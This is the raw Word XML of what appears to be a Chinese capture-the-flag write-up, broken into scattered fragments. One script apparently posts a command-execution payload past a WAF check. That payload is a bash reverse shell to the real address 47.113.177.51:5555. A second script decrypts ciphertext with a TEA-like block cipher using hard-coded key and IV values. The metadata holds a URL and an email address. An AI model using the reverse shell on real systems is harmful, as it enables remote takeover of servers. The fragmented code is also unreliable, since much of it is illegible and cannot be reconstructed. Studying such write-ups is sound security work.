          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>check_waf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9F86F89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post_data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{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"iIsGod"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DBA82B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4EC9B0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>requests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56FFB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cookies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cookies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post_data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proxies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po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7CF6BD1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56F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大胆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B67DD82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56F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1AA9A0FE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56FF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891DECD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56F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0F1D56F6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39DD1D6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shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56F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 exec_cmd_payload(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56FFB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>check_waf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56FFB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'bash -c "bash -i &gt;&amp; /dev/tcp/47.113.177.51/5555 0&gt;&amp;1"'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8800F9" w14:textId="77777777" w:rsidR="00F56FFB" w:rsidRPr="00F56FFB" w:rsidRDefault="00F56FFB" w:rsidP="00F56FF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56FF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56FFB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56F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094D1F" w14:textId="6B92C61A" w:rsidR="000C7D81" w:rsidRDefault="00CD05A7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本二：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3695F1C7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Crypto.Util.Padding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unpad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31693E14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Crypto.Util.number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bytes_to_long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b2l, long_to_bytes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l2b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7F567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Crypto.Random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get_random_bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0925CF5B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enum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Enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9096A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F027CF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Enum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334114F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ECB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01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F88C6C2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CBC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02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3DF01F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CFB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03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C31B88C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8179D2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Cipher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42B5884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DEF70A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64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C1B96B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[b2l(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63F3164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9e3779b9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAAD53E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</w:p>
    <w:p w14:paraId="57C3ACD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ROUNDS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64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CAEE7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C2AA803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CBC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ECB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7C6D0E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F709691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CFB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4D026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621F6E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_xor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55C9C0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_a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_b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_a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_b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zip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CDA5C9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1EA834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encrypt_block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327B84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b2l(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[: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75D4FFB0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b2l(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:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0761EDD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2EEF28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3DBFF10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ROUNDS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9D4DB9C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DELTA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F9BE80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)])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)])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290DEB4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&amp;=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msk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1607ADCE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)])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)])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA3755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&amp;=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msk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD9DC67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l2b((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CE94C0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16CF6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decrypt_block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F1FB653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b2l(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[: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5EA27D6B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b2l(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:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB267F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94B0608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ROUNDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E334D8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ROUNDS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1330298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)])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)])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF7826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&amp;=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msk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E523C3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)])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)])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DD4740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&amp;=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msk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B03355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DELTA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65225BA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l2b((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237BC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6502DC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encrypt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CF9E76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pad(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2FB47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132ADC60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6E5509B1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ECB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F61BBB1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36A60D2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encrypt_block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114B3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CBC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97FE27C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</w:p>
    <w:p w14:paraId="1A2096E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F49C5F3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enc_block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encrypt_block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_xor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C3BF7A8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enc_block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2398D5F4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enc_block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3954B71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CFB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201228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</w:p>
    <w:p w14:paraId="00969D31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D1915DB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encrypt_block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682DBF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enc_block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_xor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AFD21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enc_block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551C7CE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enc_block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F05FA4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</w:p>
    <w:p w14:paraId="6091F97B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1CDAE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decrypt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D065CA7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781D6E3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1C1A6EC7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ECB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D189BB0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4198F24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decrypt_block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9560F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CBC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4B604E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</w:p>
    <w:p w14:paraId="35E6E098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542F66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_xor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decrypt_block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4F4407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</w:p>
    <w:p w14:paraId="495AB82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</w:p>
    <w:p w14:paraId="38587C1A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Mode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CFB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9DBE8C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IV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA3D72C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B82BCC7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encrypt_block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90F9A1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_xor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C57F6F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pt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B6BF88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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDEA810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05A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unpad(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D05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E237C4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823EC1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5AE692D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fromhex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'3362623866656338306539313238353733373566366338383563666264386133'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05AEF3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IV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fromhex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'64343537373337663034346462393931'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1584AE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Cipher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KEY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D05A7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4FC1FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IV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C8FF055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fromhex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'1cb8db8cabe8edbbddb236d5eb6f0cdeb610e9af855b52d3'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03E716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5C51AB9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decrypted_message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decrypt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ct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9EFBFC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05A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05A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 xml:space="preserve">'Decrypted message: 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D05A7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>decrypted_message</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD05A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D05A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D05A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F359EAE" w14:textId="77777777" w:rsidR="00CD05A7" w:rsidRPr="00CD05A7" w:rsidRDefault="00CD05A7" w:rsidP="00CD05A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FFF5A2" w14:textId="77777777" w:rsidR="00CD05A7" w:rsidRPr="00CD05A7" w:rsidRDefault="00CD05A7"/>
    <w:sectPr w:rsidR="00CD05A7" w:rsidRPr="00CD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3E"/>
    <w:rsid w:val="00066490"/>
    <w:rsid w:val="000C7D81"/>
    <w:rsid w:val="00437A38"/>
    <w:rsid w:val="00464929"/>
    <w:rsid w:val="005E4185"/>
    <w:rsid w:val="006C105D"/>
    <w:rsid w:val="007166D3"/>
    <w:rsid w:val="00740925"/>
    <w:rsid w:val="008E3B82"/>
    <w:rsid w:val="00937D58"/>
    <w:rsid w:val="00956FFE"/>
    <w:rsid w:val="009C3656"/>
    <w:rsid w:val="00A54BE1"/>
    <w:rsid w:val="00C46E27"/>
    <w:rsid w:val="00CD05A7"/>
    <w:rsid w:val="00CE429A"/>
    <w:rsid w:val="00D34D3E"/>
    <w:rsid w:val="00E70258"/>
    <w:rsid w:val="00F5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0696"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6A93516A-FA41-4BC5-8AF3-5FBF465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92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0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1.200.138.180:16356/evlelLL/646979696775616e&#65292;F1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1504895347@qq.com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3013</Words>
  <Characters>17175</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>143</Lines>
  <Paragraphs>40</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>20148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9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-22T13:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-23T10:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>